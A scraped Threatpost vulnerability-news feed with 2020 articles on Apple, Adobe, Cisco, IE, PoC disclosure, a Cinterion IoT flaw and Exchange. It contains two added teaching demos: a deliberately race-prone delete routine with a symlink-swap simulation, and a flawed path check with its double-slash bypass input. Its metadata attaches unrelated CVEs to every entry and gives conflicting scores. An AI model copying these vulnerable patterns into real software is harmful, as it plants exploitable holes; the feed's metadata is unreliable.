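The relying-party code is the same in both runs, which is the practical lesson for the "additional security measures" Jain mentions: a third-party app cannot detect a token the issuer signed for the wrong subject, so anything it layers on top (a second factor, a confirmation to an address it already holds) has to be independent of the token's own claims.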
Threatpost has reached out to Jain for further details on the timeline of discovering and reporting the flaw.\n\n[Apple in December 2019](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) opened up its historically private bug-bounty program to the public, bolstering its top payout to $1 million, in an effort to weed out serious vulnerabilities. Another Apple flaw recently [disclosed in April](<https://threatpost.com/apple-safari-flaws-webcam-access/154476/>) earned a bug bounty hunter $75,000 for finding Safari flaws that could be exploited to snoop on iPhones, iPads and Mac computers using their microphones and cameras.\n
", "cvss3": {}, "published": "2020-06-01T16:07:45", "type": "threatpost", "title": "Apple Pays $100K Bounty for Critical 'Sign in With Apple' Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-01T16:07:45", "id": "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "href": "https://threatpost.com/apple-100k-bounty-critical-sign-in-with-apple-flaw/156167/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:25", "description": "Adobe has released an out-of-band patch for a critical vulnerability in its Creative Cloud Desktop Application for Windows. The flaw can be exploited by an attacker to delete arbitrary files on the victim\u2019s system.\n\nCreative Cloud acts as a central console for desktop users to quickly launch, manage and update their Adobe apps, such as Photoshop, Acrobat, Illustrator and more. Specifically affected is the Creative Cloud desktop application version 5.0 and earlier; Adobe has made the necessary fixes in version 5.1 of the application.\n\n\u201cSuccessful exploitation could lead to arbitrary file deletion in the context of the current user,\u201d said Adobe, [in a Tuesday post](<https://helpx.adobe.com/security/products/creative-cloud/apsb20-11.html>). \u201cAdobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin.\u201d\n\nThe flaw ([CVE-2020-3808](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3808>)) stems from a time-of-check to time-of-use (TOCTOU) race condition. A race condition occurs when the outcome of two or more operations on shared state depends on the order or timing in which they run. 
In a TOCTOU race, a program checks some state (whether a path refers to the file it expects, for example, or whether a credential is valid) and then acts on the result of that check, but an attacker can change that state in the window between the check and the use, so the action is applied to something other than what was checked.\n\nIf exploited, the flaw could enable arbitrary file deletion, allowing an attacker to delete certain critical files. However, further details about the attack \u2014 such as whether an attacker would need to be local or remote, or whether they would need to be authenticated \u2014 were not provided by Adobe. Threatpost has reached out for further clarification.\n\nThe security upgrade is a \u201cpriority 2\u201d update. According to Adobe, that means that it resolves vulnerabilities in a product that has historically been at elevated risk \u2013 but that there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d according to Adobe.\n\nIt\u2019s the second out-of-band update for [Adobe in March](<https://threatpost.com/critical-adobe-photoshop-acrobat-reader-flaws/153902/>). Last week Adobe disclosed an update addressing critical vulnerabilities in its Photoshop and Acrobat Reader products, which if exploited could allow arbitrary code-execution. Overall, Adobe last week patched flaws tied to 41 CVEs across its products, 29 of which were critical in severity. 
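Adobe published no detail of the vulnerable code path, so the following is an added, generic illustration of the TOCTOU class the advisory names, not the Creative Cloud bug itself: a delete routine that validates a path and then deletes by that same path, beside one that pins the directory with a file descriptor and deletes relative to it. It uses POSIX primitives (`O_NOFOLLOW`, `dir_fd`), so it runs on Linux or macOS rather than on the Windows application the article concerns; the Windows analogue is to hold a handle to the directory and act through that handle. The scratch tree, file names and the hook that stands in for the attacker winning the race are constructed.

```python
"""Time-of-check/time-of-use on a delete-by-path routine, POSIX semantics.

delete_by_path() validates a path and then deletes by the same path; a local
attacker who wins the race can swap a directory component for a symlink and
redirect the deletion. delete_by_fd() pins the directory with a descriptor
opened O_NOFOLLOW and deletes relative to it, so the later lookup cannot be
redirected. The race is made deterministic with a hook instead of threads."""
import os
import stat
import tempfile


def delete_by_path(cache_dir, name, race_hook=None):
    """Vulnerable: lstat() the target, then unlink() the same *path* string."""
    path = os.path.join(cache_dir, name)
    if not stat.S_ISREG(os.lstat(path).st_mode):      # time of check
        raise ValueError("not a regular file")
    if race_hook:
        race_hook()                                    # attacker's window
    os.unlink(path)                                    # time of use: fresh path walk


def delete_by_fd(cache_dir, name, race_hook=None):
    """Hardened: open the directory once (refusing a symlink), then check and
    delete relative to that descriptor; renaming or replacing cache_dir
    afterwards cannot redirect the unlink."""
    dfd = os.open(cache_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        if not stat.S_ISREG(os.lstat(name, dir_fd=dfd).st_mode):
            raise ValueError("not a regular file")
        if race_hook:
            race_hook()                                # same window, now harmless
        os.unlink(name, dir_fd=dfd)
    finally:
        os.close(dfd)


def simulate(delete_fn):
    """Run delete_fn under a simulated symlink swap in a scratch tree.

    Returns (victim_file_survived, cache_file_deleted); a correct routine
    yields (True, True), the vulnerable one (False, False)."""
    with tempfile.TemporaryDirectory() as root:
        cache = os.path.join(root, "cache")
        victim = os.path.join(root, "victim")
        os.mkdir(cache)
        os.mkdir(victim)
        for d in (cache, victim):
            with open(os.path.join(d, "tmp.dat"), "w") as f:
                f.write("constructed sample file\n")

        def attacker_swaps_directory():
            # Between check and use: move the real directory aside and put a
            # symlink to the victim directory at the path the deleter trusts.
            os.rename(cache, cache + ".bak")
            os.symlink(victim, cache)

        try:
            delete_fn(cache, "tmp.dat", race_hook=attacker_swaps_directory)
        except OSError:
            pass
        victim_survived = os.path.exists(os.path.join(victim, "tmp.dat"))
        cache_deleted = not os.path.exists(os.path.join(cache + ".bak", "tmp.dat"))
        return victim_survived, cache_deleted


if __name__ == "__main__":
    print("by path:", simulate(delete_by_path))   # (False, False)
    print("by fd:  ", simulate(delete_by_fd))     # (True, True)
```

The fix is not a faster check but removing the second path lookup: once the directory is held open, every later operation is resolved against that object, and a symlink planted at the original path is never consulted. The same principle applies to any check-then-act pair on a filesystem, which is why the race survives in a privileged deleter even when the check itself is correct.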
The fixes were released outside of Adobe\u2019s regularly scheduled update day, which was earlier in March (during which Adobe had no patches).\n\nAdobe credited Jiadong Lu of South China University of Technology and Zhiniang Peng of Qihoo 360 Core Security (@edwardzpeng) for finding the flaw.\n", "cvss3": {}, "published": "2020-03-24T17:46:31", "type": "threatpost", "title": "Critical Adobe Flaw Fixed in Out-of-Band Security Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3808"], "modified": "2020-03-24T17:46:31", "id": "THREATPOST:5B34B9C962E93AFAD432CA452F1AA316", "href": "https://threatpost.com/critical-adobe-flaw-out-of-band-security-update/154075/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-10-15T22:24:08", "description": "A critical flaw in the High Availability (HA) service of Cisco Smart Software Manager On-Prem Base has been uncovered, which would open the door to remote attackers thanks to its use of a static, default password, even if the platform isn\u2019t directly connected to the internet.\n\nCisco Smart Software Manager On-Prem Base is used to manage a customer or partner\u2019s product licenses, providing near real-time visibility and reporting of the Cisco licenses that an organization purchases and consumes. 
According to Cisco\u2019s [product literature](<https://www.cisco.com/c/dam/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/smart-software-manager-onprem.pdf>), the platform is aimed at \u201ccustomers who have strict security requirements and do not want their products to communicate with the central licensing database on Smart Software Manager over a direct Internet connection,\u201d like financial institutions, utilities, service providers and government organizations.\n\nThe hard-coded password is for \u201ca [HA] system account [that] is not under the control of the system administrator,\u201d Cisco said in [an advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-on-prem-static-cred-sL8rDs8>) issued Wednesday on the bug, tracked as CVE-2020-3158. Essentially, anyone who discovered the password (presumably available in installation guides or other documentation available online) could log onto this account and then, from there, connect to the Cisco Smart Software Manager On-Prem Base.\n\n\u201cVulnerabilities like CVE-2020-3158 could not be any easier for attackers to compromise,\u201d Chris Hass, director of information security and research at Automox, told Threatpost. \u201cSystems with default, hardcoded credentials completely remove the need for any real technical skill, and drastically reduce the time to be weaponized.\u201d\n\nThe vulnerability, which has a score of 9.8 on the CVSS bug-severity scale, \u201ccould allow an unauthenticated, remote attacker to access a sensitive part of the system with a high-privileged account,\u201d Cisco said. 
\u201cA successful exploit could allow the attacker to obtain read-and-write access to system data, including the configuration of an affected device.\u201d\n\nThe good news is, while attackers would gain access to a sensitive portion of the system, they would not have full administrative rights to control the device.\n\nNo workarounds are available, but Cisco issued a patch this week (Cisco Smart Software Manager On-Prem release 7-202001). The vulnerability only affects systems if the HA feature is enabled. HA is not enabled by default.\n\nSteven Van Loo of hIQkru was given credit for discovering the flaw.\n\n\u201cIt is unfortunate that the [lessons of Mirai](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) have not translated into stronger security hardening practices,\u201d Hass said. \u201cAnd to see manufacturers and critical service providers continue to ignore the basics of cyber-hygiene is disappointing.\u201d\n\n## A Buggy Start to the Year\n\nCisco has released patches for a number of flaws already in 2020, including fixes for [five critical vulnerabilities](<https://threatpost.com/critical-cisco-cdpwn-flaws-network-segmentation/152546/>) that were discovered in Cisco Discovery Protocol (CDP), the info-sharing layer that maps all Cisco equipment on a network. Dubbed \u201cCDPwn,\u201d they can allow attackers with an existing foothold in the network to break through network segmentation efforts and remotely take over millions of devices.\n\nIn January, high-severity vulnerabilities affecting over a half dozen of its small business switches [were patched](<https://threatpost.com/cisco-patches-high-severity-bugs-in-switch-lineup/152392/>), which allow remote unauthenticated adversaries to access sensitive information and level denial-of-service (DoS) attacks against affected gear.\n\nSeparately, it has patched two high-severity vulnerabilities in its popular Webex video conferencing platform. 
[One of them ](<https://threatpost.com/cisco-webex-flaw-lets-unauthenticated-users-join-private-online-meetings/152191/>)could let strangers barge in on password-protected meetings \u2013 no authentication necessary; the other[ that was patched](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) could allow remote code execution.\n\nAlso in January, a critical Cisco vulnerability [emerged in its administrative management tool](<https://threatpost.com/cisco-critical-network-security-tool-flaw/152131/>) for Cisco network security solutions. The flaw could allow an unauthenticated, remote attacker to gain administrative privileges on impacted devices.\n\nAnd to kick off the year, [three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) impacting a key tool for managing its network platform and switches were patched. The bugs could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices, the vendor said. Proof-of-concept exploits [emerged shortly](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) after disclosure.\n", "cvss3": {}, "published": "2020-02-20T17:29:46", "type": "threatpost", "title": "Critical Cisco Bug Opens Software Licencing Manager to Remote Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3158"], "modified": "2020-02-20T17:29:46", "id": "THREATPOST:74D46F285623FE008F8AABA5323341D4", "href": "https://threatpost.com/critical-cisco-bug-software-licencing-remote-attack/153086/", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2020-10-16T23:18:13", "description": "An unpatched remote code-execution vulnerability in Internet Explorer is being actively exploited in the wild, Microsoft has announced. It\u2019s working on a patch. 
In the meantime, workarounds are available.\n\nThe bug (CVE-2020-0674), which is listed as critical in severity for IE 11 and moderate for IE 9 and IE 10, exists in the way that the jscript.dll scripting engine handles objects in memory in the browser, according to [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>), issued Friday.\n\nThe vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could gain the same user rights as the current user.\n\n\u201cIf the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system,\u201d Microsoft explained. \u201cAn attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nAn attack could be carried out using a malicious website designed to exploit the vulnerability through IE, the advisory noted. Threat actors could lure victims to the site by sending an email, through watering-hole techniques, via malicious documents containing a web link and other social-engineering efforts.\n\nThere is a workaround available from Microsoft, as well as a [micropatch from 0patch](<https://blog.0patch.com/2020/01/micropatching-workaround-for-cve-2020.html>), released on Tuesday.\n\n## Darkhotel APT Active Attacks\n\nThe in-the-wild attacks are likely the work of the Asian APT known as Darkhotel, according to the researchers at Qihoo 360 who found the bug.\n\n\u201cThe impact [could be] no less than the damage caused by the previous WannaCry ransomware virus,\u201d the security firm said in a Chinese-language [web advisory](<https://www.geekpark.net/news/254734>). 
\u201cAt present, it is judged from the details and characteristics of the captured attacks that the zero-day vulnerability of IE browser is suspected to have come from the Peninsula\u2019s APT organization, Darkhotel.\u201d\n\nDarkhotel was first identified in [2014](<https://threatpost.com/darkhotel-apt-group-targeting-top-executives-in-long-term-campaign/109265/>) by Kaspersky researchers, who said the group had been active since at least 2007. The group is known for targeting diplomats and corporate executives via Wi-Fi networks at luxury hotels \u2013 but it has widened its targeting over the years, while continuing to [leverage zero-day vulnerabilities](<https://threatpost.com/darkhotel-exploits-microsoft-zero-day-vbscript-flaw/136685/>) and exploits.\n\nIn this case, Darkhotel is using Office documents for targeted attacks, according to Qihoo 360.\n\n\u201cThe attacker\u2019s in-field exploitation embeds the vulnerability in an Office document, and users will be successful when they open an Office document or browse the web,\u201d the firm warned. \u201cOnce the user opens the malicious document carrying the vulnerability, he will browse the malicious webpage and execute the attack program. The user is not even aware that the device has been controlled. The attacker can take the opportunity to implant ransomware, monitor and monitor, and steal sensitive information And so on.\u201d\n\n## Patch and Workaround\n\nWhile Microsoft is aware of \u201climited targeted attacks,\u201d a patch won\u2019t be released until next month\u2019s Patch Tuesday, according to the computing giant.\n\n\u201cOur standard policy is to release security updates on Update Tuesday, the second Tuesday of each month. 
This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers,\u201d it said.\n\nOne of the reasons the sense of urgency may be less than one would expect with a zero-day is the fact that all supported versions of IE in their default configuration use Jscrip9.dll as their scripting engine, which is not vulnerable to the flaw. However, the issue affects versions of IE being used in Windows 7, which [reached end-of-life](<https://threatpost.com/get-ready-for-the-microsoft-windows-7-eol-on-january-14th/151571/>) last week and therefore no longer supported. Qihoo 360 warned that this install base in particular is at risk.\n\nFor those that do use jscript.dll, Microsoft detailed a workaround that involves using administrative commands to restrict access to the scripting library. It\u2019s not ideal however: It could result in reduced functionality for components or features that rely on jscript.dll.\n\n\u201cFor example, depending on the environment, this could include client configurations that leverage proxy automatic configuration scripts (PAC scripts),\u201d Microsoft said. \u201cThese features and others may be impacted.\u201d\n\nAlso, users will need to revert this workaround in order to install any future patches or updates.\n\nThe team at 0patch has meanwhile released micropatch this week that implements the workaround while addressing some of the downsides.\n\n> We are planning to issue a micropatch for CVE-2020-0674 next week which will prevent Internet Explorer from loading jscript.dll, effectively implementing Microsoft's workaround but without some unwanted side effects such as breaking the sfc command. 
\n(cont)\n> \n> \u2014 0patch (@0patch) [January 19, 2020](<https://twitter.com/0patch/status/1218889033373364229?ref_src=twsrc%5Etfw>)\n\n\u201cBecause the provided workaround has multiple negative side effects, and because it is likely that Windows 7 and Windows Server 2008 R2 users without Extended Security Updates will not get the patch at all (their support ended this month), we decided to provide a micropatch that simulates the workaround without its negative side effects,\u201d the company said in a blog. \u201cMicrosoft\u2019s workaround comprises setting permissions on jscript.dll such that nobody will be able to read it. This workaround has an expected negative side effect that if you\u2019re using a web application that employs legacy JScript (and can as such only be used with Internet Explorer), this application will no longer work in your browser.\u201d\n\nAccording to 0patch, other negative side effects of the workaround that the micropatch avoids are:\n\n * Windows Media Player is [reported to break on playing MP4 files](<https://www.askwoody.com/forums/topic/yet-another-jscript-vulnerability/#post-2086829>).\n * The sfc (Resource Checker), a tool that scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions, [chokes on _jscript.dll_ with altered permissions](<https://www.askwoody.com/forums/topic/yet-another-jscript-vulnerability/#post-2086857>).\n * [Printing to \u201cMicrosoft Print to PDF\u201d is reported to break](<https://www.askwoody.com/forums/topic/yet-another-jscript-vulnerability/#post-2087468>).\n * Proxy automatic configuration scripts (PAC scripts) may not work.\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. 
_**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n", "cvss3": {}, "published": "2020-01-21T14:58:58", "type": "threatpost", "title": "Microsoft Zero-Day Actively Exploited, Patch Forthcoming", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0674", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-21T14:58:58", "id": "THREATPOST:16E580ECF9CBAD8F883D6241A7754060", "href": "https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T23:18:05", "description": "When it comes to the release of proof-of-concept (PoC) exploits, more security experts agree that the positives outweigh the negatives, according to a recent and informal Threatpost poll.\n\n[](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)Last week, [Threatpost conducted a reader poll](<https://threatpost.com/poll-published-poc-exploits-good-bad/151966/>) and almost 60 percent of 230 security pundits thought it was a \u201cgood idea\u201d to publish PoC code for zero days. Up to 38 percent of respondents, meanwhile, argued it wasn\u2019t a good idea.\n\nThe debate comes on the heels of PoC code being released last week for an [unpatched remote-code-execution vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products. 
The PoC exploits, which were published to showcase how the vulnerability can be exploited, raised questions about the positive and negative consequences of releasing such code for an unpatched vulnerability.

Some argued that the code can be used to test networks and pinpoint vulnerable aspects of a system, as well as motivate companies to patch, but others in the security space have argued that PoC code gives attackers a blueprint to launch and automate attacks.

## Security Motivator

Many security experts point to the role of PoC code publication in motivating impacted companies and manufacturers to adopt more effective security measures. That was the argument of one such advocate, Dr. Richard Gold, head of security engineering at Digital Shadows, who said that PoC code enables security teams to test whether their systems are exploitable.

“Rather than having to rely on vendor notifications or software version number comparisons, a PoC allows the direct verification of whether a particular system is exploitable,” Gold told Threatpost. “This ability to independently verify an issue allows organizations to better understand their exposure and make more informed decisions about remediation.”

In fact, up to 85 percent of respondents said that the release of PoC code acts as an “effective motivator” to push companies to patch. Seventy-nine percent say that the disclosure of a PoC exploit has been “instrumental” in preventing an attack. And 85 percent of respondents said that a PoC code release is acceptable if a vendor won’t fix a bug in a timely manner.

When it comes to the [recent Citrix vulnerability (CVE-2019-19781)](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), for instance, advocates argue that, though PoC exploits were released before a patch was available, the code drew attention to the large number of vulnerable devices that were online. Citrix also [accelerated its patch schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) after PoC exploits were released (though there is no proof of correlation between this and the PoC exploit releases).

“As a result [of the Citrix PoC exploits], there has been a widespread effort to patch or mitigate vulnerable devices rather than leaving them unpatched or unsecured,” Gold stressed.

## A Jump in Actual Exploits

On the flip side of the argument, many argue that the release of the Citrix PoC exploits was a bad idea. They say attacks attempting to exploit the vulnerability skyrocketed as bad actors rushed to exploit it before systems were patched. In fact, 38 percent of respondents in Threatpost’s poll argued that PoC exploit releases are a bad idea.

Matt Thaxton, senior consultant at Crypsis Group, thinks that the “ultimate function of a PoC is to lower the bar for others to begin making use of the exploit.”

“I believe there are more negatives than positives to publishing proofs, and generally, it is not a good idea,” he told Threatpost. “In many cases, PoC’s are put out largely for the notoriety/fame of the publisher and for the developer to ‘flex’ their abilities.”

Joseph Carson, chief security scientist at Thycotic, told Threatpost that while he thinks PoC exploits can have a positive impact, “it is also important to include what defenders can do to reduce the risks, such as methods to harden systems or best practices.”

“Let’s be realistic, once a zero-day is known, it is only a matter of time before nation states and cybercriminals are abusing them,” said Carson. “Sometimes they already know about the zero-day and have been abusing them for years.”

Respondents in the poll were also split about how long it is appropriate to wait before releasing PoC code after a flaw has been disclosed, with 29 percent arguing 90 days is the appropriate amount and others opting for one month (25 percent), one week (23 percent) or two weeks (14 percent).

This issue of a PoC exploit timeline also brings up important questions around patch management for companies dealing with the fallout of publicly-released code. Some, like Thaxton, say that PoC exploit advocates fail to recognize the complexity of patching large environments: “I believe the release of PoC code functions more like an implied threat to anyone that doesn’t patch: ‘You’d better patch . . . or else,’” he said. “This kind of threat would likely be unacceptable outside of the infosec world. This is even more obvious when PoCs are released before or alongside a patch for the vulnerability.”

## PoC Exploits Surge

At the end of the day, PoC exploits continue to be published. In fact, beyond the release of the Citrix PoC code, a slew of other PoC exploits were released last week, [including ones for](<https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/>) a recently patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) (NSA) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>); and another for critical flaws impacting the [Cisco Data Center Network Manager](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) tool for managing network platforms and switches.

Gold, for his part, argued that the line between a theoretical vulnerability and a demonstrated exploitation of a real system makes all the difference when it comes to PoC exploits versus active exploits.

“Once that threshold has been crossed, it is understood that attackers will most likely be exploiting this vulnerability in real attacks,” he said. “This often provided impetus to companies to patch their systems.”

Threatpost, published 2020-01-22: <https://threatpost.com/poc-exploits-do-more-good-than-harm-threatpost-poll/152053/> (CVEs listed: CVE-2019-19781, CVE-2020-24400, CVE-2020-24407; CVSSv2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P).

# Researchers Warn of Flaw Affecting Millions of IoT Devices

Researchers are urging connected-device manufacturers to ensure they have applied patches addressing a flaw in a module used by millions of Internet-of-Things (IoT) devices. If exploited, researchers speculated that the flaw could allow attackers to knock out a city’s electricity or even overdose a medical patient.

The vulnerability exists in a widely used Cinterion module, a small electronic device embedded in IoT devices that connects to wireless networks and sends and receives data. The module is manufactured by Thales, a French company that designs and builds electrical systems for aerospace markets.

Researchers discovered the flaw in Cinterion’s EHS8 module – however, further testing revealed that other models in the same product line were also affected (BGS5, EHS5/6/8, PDS5/6/8, ELS61, ELS81, PLS62).
The flaw could be exploited to steal confidential information, take control of devices, gain access to control networks and more.

“[The modules] store and run Java code, often containing confidential information like passwords, encryption keys and certificates,” said Adam Laurie, with IBM X-Force Threat Intelligence, [in a Wednesday post](<https://securityintelligence.com/posts/new-vulnerability-could-put-iot-devices-at-risk/>). “Using information stolen from the modules, malicious actors can potentially control a device or gain access to the central control network to conduct widespread attacks – even remotely via 3G in some cases.”

The vulnerability ([CVE-2020-15858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15858>)) was first discovered last September, and Thales issued a fix in early 2020 – but while patches are available, researchers warn that it will take a while for many critical-infrastructure manufacturers to apply them to their devices. Researchers disclosed the flaw on Wednesday, after working with Thales “to ensure users are aware of the patch and taking steps to secure their systems.”

Researchers found a way to bypass security checks that keep files or operational code hidden from unauthorized users.

The flaw exists in the way that AT commands are processed by the module, Dan Crowley, research director at IBM X-Force Red, told Threatpost. It is related to a string of Java code that counts the number of characters in the path substring.

That code checks whether the fourth character of the path substring is a dot. Normally, any attempt to access a hidden file with a dot-prefixed name is denied (for example, a:/.hidden_file). Replacing the slash with a double slash (a://.hidden_file), however, puts a slash in the fourth position, so the condition is never met and the request goes through, even though it resolves to the same hidden file. An attacker can therefore reach the dot-prefixed file and bypass the security check.

“A real-world attacker could go wardialing to try to identify modems over the cellular network, attempting to issue the AT command that exploits the flaw,” Crowley explained. “Some of these will be the vulnerable module, and an attacker will then have an assortment of phone numbers and associated code retrieved from the device at that number. By inserting backdoors into the code and writing them back, the attacker would be in control of various IoT devices around the world.”

If exploited, attackers could potentially access the wealth of confidential data stored by the modules. This may include intellectual property (IP), credentials, passwords, encryption keys and more. And, due to the sheer breadth of connected devices that are powered by this module – from medical devices to connected utilities – researchers warn that the potential impact of the flaw could be dire if not patched.

For instance, the flaw could be used in medical devices that leverage the module to manipulate readings from monitoring devices, to cover up concerning vital signs or create false panic.

“In a device that delivers treatment based on its inputs, such as an insulin pump, cybercriminals could over- or underdose patients,” said researchers.

And in the utility space, it could be used to compromise smart meters to deliver falsified readings that increase or reduce a monthly bill.

“With access to a large group of these devices through a control network, a malicious actor could also shut down meters for an entire city, causing wide-reaching blackouts that require individual repair visits, or, even worse, damage to the grid itself,” said researchers.

Vulnerabilities and security issues [continue to plague connected devices](<https://threatpost.com/iot-security-healthcare-industry/150157/>) – even as the number of internet-connected devices used globally is predicted to grow to [55.9 billion](<https://blogs.idc.com/2019/11/04/how-you-contribute-to-todays-growing-datasphere-and-its-enterprise-impact/>) by 2025. More than half of all IoT devices are vulnerable to medium- or high-severity attacks, meaning that enterprises are sitting on a “ticking IoT time bomb,” [researchers warned earlier this year](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>).

X-Force security researchers for their part said that this specific patch can be administered by IoT manufacturers in two ways – either by plugging in a USB device to run an update via software, or by administering an over-the-air (OTA) update. However, the more heavily regulated devices, including connected medical devices or industrial-control gear, will have more difficulty applying the patch, since doing so may require recertification, an often time-intensive process, they said.

“The patching process for this vulnerability is completely dependent on the manufacturer of the device and its capabilities – for example, whether the device has access to the internet could make it complicated to work with,” they said.
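The fourth-character check and its double-slash bypass, reconstructed as an added example. This is not the Java that runs on the Cinterion module (that code is not on the page): the flawed function follows IBM X-Force's description of the check, the hardened variant is this editor's suggestion rather than Thales' actual patch, and the file store is a constructed stand-in for the module's file system.

```python
"""Added example reconstructing the CVE-2020-15858 path check and its bypass.

Not the module's real code. `flawed_is_allowed` mirrors the described check
(inspect only the fourth character of the path); `hardened_is_allowed` is a
suggested fix; FILE_STORE is a constructed stand-in for the module's files.
"""
import posixpath
from typing import Callable, Optional

# Constructed stand-in for the module's file system, keyed by canonical path.
FILE_STORE = {
    "a:/.hidden_file": b"constructed: AT-command password and private key",
    "a:/readme.txt": b"public content",
}

def canonical(path: str) -> str:
    """Resolve '//', '/./' and '/../' the way the file system would."""
    drive, _, rest = path.partition(":")
    return f"{drive}:{posixpath.normpath('/' + rest.lstrip('/'))}"

def flawed_is_allowed(path: str) -> bool:
    """The check as described: deny only when the 4th character is a dot.

    'a:/.hidden_file'  -> path[3] == '.' -> denied
    'a://.hidden_file' -> path[3] == '/' -> allowed, but resolves to the same file
    """
    return len(path) < 4 or path[3] != "."

def hardened_is_allowed(path: str) -> bool:
    """Canonicalise first, then reject any dot-prefixed path component."""
    _drive, _, rest = canonical(path).partition(":")
    return not any(part.startswith(".") for part in rest.split("/") if part)

def read_file(path: str, is_allowed: Callable[[str], bool]) -> Optional[bytes]:
    """Simulated file-read AT command: run the access check, then resolve."""
    if not is_allowed(path):
        return None
    return FILE_STORE.get(canonical(path))

if __name__ == "__main__":
    for p in ("a:/.hidden_file", "a://.hidden_file", "a:/sub/../.hidden_file"):
        print(p, "flawed:", read_file(p, flawed_is_allowed),
              "hardened:", read_file(p, hardened_is_allowed))
```

The hardened check goes beyond the double-slash case in the text: any path that the file system would collapse onto a dot-prefixed name (a:/sub/../.hidden_file, a:/./.hidden_file) is also refused, because the decision is made on the canonical path rather than on the raw string the caller supplied.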
Threatpost, published 2020-08-19: <https://threatpost.com/flaw-affecting-millions-iot-devices/158472/> (CVEs listed: CVE-2020-15858, CVE-2020-24400, CVE-2020-24407; CVSSv2 3.6, AV:L/AC:L/Au:N/C:P/I:P/A:N).

# Serious Exchange Flaw Still Plagues 350K Servers

Over 80 percent of exposed Exchange servers are still vulnerable to a severe vulnerability – nearly two months after the flaw was patched, and after researchers warned that multiple threat groups were exploiting it.

The vulnerability in question ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to create unique keys at install time (every installation shares the same static ASP.NET validation key, so a signed ViewState can be forged), opens servers up to authenticated attackers, who could execute code remotely on them with SYSTEM privileges.

Researchers recently used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw.
Out of 433,464 internet-facing Exchange servers observed, at least 357,629 were vulnerable (as of March 24).

“If your organization is using Exchange and you aren’t sure whether it has been updated, we strongly urge you to skip to the Taking Action section immediately,” said Tom Sellers, manager of the Rapid7 Labs team, in a [Monday analysis](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>).

